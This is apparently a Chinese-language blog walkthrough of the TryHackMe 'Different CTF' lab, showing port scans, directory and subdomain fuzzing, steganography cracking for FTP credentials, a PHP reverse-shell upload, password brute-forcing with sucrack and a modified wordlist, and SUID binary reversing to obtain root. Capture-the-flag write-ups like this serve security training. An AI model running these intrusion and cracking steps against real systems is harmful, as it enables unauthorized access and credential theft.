打靶记录(四十)之THMDifferentCtf

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.35.124         
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:18 CST
Nmap scan report for 10.10.35.124
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

sudo nmap -sT -sV -sC -O -p21,80 10.10.35.124          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:20 CST
Nmap scan report for 10.10.35.124
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
|_http-title: Hello World – Just another WordPress site
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix

sudo nmap --script=vuln -p21,80 10.10.35.124                                                  
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 11:20 CST
Nmap scan report for 10.10.35.124
Host is up (0.22s latency).

PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.35.124
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.35.124:80/
|     Form id: 
|_    Form action: http://adana.thm/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: hakanbey01
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /phpmyadmin/: phpMyAdmin
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 5.6
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.

2个端口

Web

添加adana.thm到hosts

gobuster dir -u http://10.10.35.124/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x rar,zip,sql,txt,jsp,php,html,bak

发现一个隐藏目录：/announcements

里面是一张图片和一个字典

用exiftool,strings,binwalk来查看一下图片，没有隐写。

既然有了字典，上面又得知有个用户名：hakanbey01，试着爆破一下密码

wpscan --url http://adana.thm/wp-login.php -U hakanbey01 -P wordlist.txt

然而爆破不出来？也许这有些误导。看了下房间的标签，有个stego,图片隐写？？？也许得到的那张图片是有用的

stegseek austrailian-bulldog-ant.jpg wordlist.txt

得到一串base64

RlRQLUxPR0lOClVTRVI6IGhha2FuZnRwClBBU1M6IDEyM2FkYW5hY3JhY2s=

FTP-LOGIN
USER: hakanftp
PASS: 123adanacrack

FTP登录

Getshell

发现处于一个目录，而且和Web目录是一致的，那就FTP上传一个反弹shell。但是上传后访问提示文件不存在？？也许有WAF之类的把拦截了。

在wp-config.php中找到一些信息

define( 'DB_NAME', 'phpmyadmin1' );

/** MySQL database username */
define( 'DB_USER', 'phpmyadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', '12345' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

在Phpadmin中登录

在wp_users表中找到用户的哈希

$P$BQML2QxAFBH4hb.qqKTpDnta6Q6Wl2/

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

但是爆破不出来，嘶。

我开始思索为什么明明reverseshell上传上去却提示404，但是FTP目录里面又有

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.adana.thm" -u http://adana.thm/ -fs 10846

试着爆破一下子域名

当我在爆破的时候，发现有两个phpadmin数据库就很奇怪了，而且发现他们的wp-options是不一样的。发现有一个子域名subdomain.adana.thm，应该又是虚拟主机，添加hosts。访问发现竟然是两个几乎一模一样的网站

访问之前上传的reverseshell,并且还要chmod 777 reverseshell.php给他执行的权限

访问，得到shell

发现hakanbey和hakanftp两个用户

在/var/www/html找到webflag

THM{343a7e2064a1d992c01ee201c346edff}

横向移动

我们可以切换到hananftp用户。但是并没有什么用。

我去查找了一下房间提到的sucrack,应该是一个爆破用户密码的工具

下载之后，打包

tar -czvf sucrack.tar.gz ./sucrack 

在FTP中，上传sucrack和之前的密码字典

put sucrack.tar.gz
put wordlist.txt

chmod 777 sucrack.tar.gz
chmod 777 wordlist.txt

mv /var/www/subdomain/sucrack.tar.gz /tmp

mv /var/www/subdomain/wordlist.txt /tmp

tar xfz sucrack.tar.gz 

cd sucrack
./configure 
make
cd src

./sucrack -u hakanbey -w 100 /tmp/wordlist.txt

但是爆破不出来，看WP，需要对字典进行一些更改

awk '{print "123adana" $0}' wordlist.txt > new-wordlist.txt

在所有字典的开头加上”123adana”

./sucrack -u hakanbey -w 100 /tmp/new-wordlist.txt

得到密码：123adanasubaru

su hakanbey

user.txt

THM{8ba9d7715fe726332b7fc9bd00e67127}

提权

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

找到一个可疑的/usr/bin/binary

让我们输入什么数字，放IDA逆向一下

v26 = __readfsqword(0x28u);
  *dest = 'raw';
  v9 = '\0';
  *src = 'enoz';
  v11 = '\0';
  *v12 = 'ni';
  v13 = '\0';
  *v14 = 'ada';
  v15 = '\0';
  *v16 = 'an';
  v17 = '\0';
  strcat(dest, src);
  strcat(dest, v12);
  strcat(dest, v14);
  strcat(dest, v16);
  printf("I think you should enter the correct string here ==>");
  __isoc99_scanf("%s", s1);
  if ( !strcmp(s1, dest) )
  {
    stream = fopen("/root/hint.txt", "r");
    __isoc99_fscanf(stream, "%s", s);
    printf("Hint! : %s", s);
    fgets(s, 255, stream);
    puts(s);
    v6 = fopen("/root/root.jpg", "rb");
    if ( !v6 )
    {
      puts("Unable to open source!");
      exit(1);
    }
    v7 = fopen("/home/hakanbey/root.jpg", "wb");
    puts("Copy /root/root.jpg ==> /home/hakanbey/root.jpg");

大概的意思就是要输入和这个dest一样的字符串，而dest在上面的数组已经给出了，要注意Linux是小端序存储，所以字符串要倒着看才是正确的顺序

所以dest是warzoneinadana

运行binary,并输入warzoneinadana，发现家目录有一个jpg，并且输出一个提示：Hexeditor 00000020 ==> ????

用NC传到kali

xxd root.jpg

选择00000020那一行的二进制

fee99d3d79185ffc826ddf1c69acc275

在cyberchef中FromHex再To base85

得到root密码：Go0odJo0BbBro0o

root.txt

THM{c5a9d3e4147a13cbd1ca24b014466a6c}

碎碎念

hard难度靶机依然稳定发挥！连续打到这种有虚拟主机的机器，以后对于域名这块还要多加关注了。这个靶机真的好多兔子洞，但凡钻一个就要折磨很久（悲。即有逆向又有图片隐写什么的还有对于图片二进制的处理，很CTF。趣味性还是很大的。